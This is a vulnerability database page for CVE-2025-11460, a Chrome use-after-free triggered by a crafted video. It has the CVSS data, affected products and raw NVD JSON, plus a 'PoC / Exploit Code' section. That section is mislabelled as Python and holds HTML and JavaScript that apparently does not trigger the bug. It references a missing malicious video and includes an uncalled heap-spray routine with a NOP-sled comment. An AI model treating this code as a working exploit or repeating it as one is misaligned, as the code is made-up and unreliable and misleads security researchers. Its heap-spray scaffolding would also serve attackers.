Security Vulnerability Report
中文
CVE-2025-11460 CVSS 8.8 HIGH

CVE-2025-11460

Published: 2025-11-06 23:15:35
Last Modified: 2025-11-25 14:48:59

Description

Use after free in Storage in Google Chrome prior to 141.0.7390.65 allowed a remote attacker to execute arbitrary code via a crafted video file. (Chromium security severity: High)

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 141.0.7390.65

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-11460 PoC - Use After Free in Storage --> <!DOCTYPE html> <html> <head> <title>CVE-2025-11460 PoC</title> </head> <body> <h1>CVE-2025-11460 Use After Free PoC</h1> <video id="target" controls> <!-- Malformed video file that triggers Use After Free in Storage --> <source src="malicious_video.mp4" type="video/mp4"> </video> <script> // Trigger the vulnerability through storage manipulation async function triggerUAF() { // Create storage reference that will be freed const storage = await navigator.storage.persist(); // Repeatedly allocate and release storage objects for (let i = 0; i < 1000; i++) { const data = new ArrayBuffer(1024 * 1024); // Force garbage collection when possible if (i % 100 === 0) { await new Promise(r => setTimeout(r, 10)); } } // Attempt to access freed storage object console.log('Storage state after trigger:', storage); } // Heap spraying technique to control freed memory function heapSpray() { const sprayData = new Uint8Array(1024 * 1024); // Fill with NOP sled and shellcode pattern for (let i = 0; i < sprayData.length; i++) { sprayData[i] = 0x90; // NOP instruction } return sprayData; } triggerUAF(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11460", "sourceIdentifier": "[email protected]", "published": "2025-11-06T23:15:35.347", "lastModified": "2025-11-25T14:48:58.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Storage in Google Chrome prior to 141.0.7390.65 allowed a remote attacker to execute arbitrary code via a crafted video file. (Chromium security severity: High)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "141.0.7390.65", "matchCriteriaId": "31C003EA-49A0-4743-AE47-02EF9C1C479B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/10/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/446722008", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}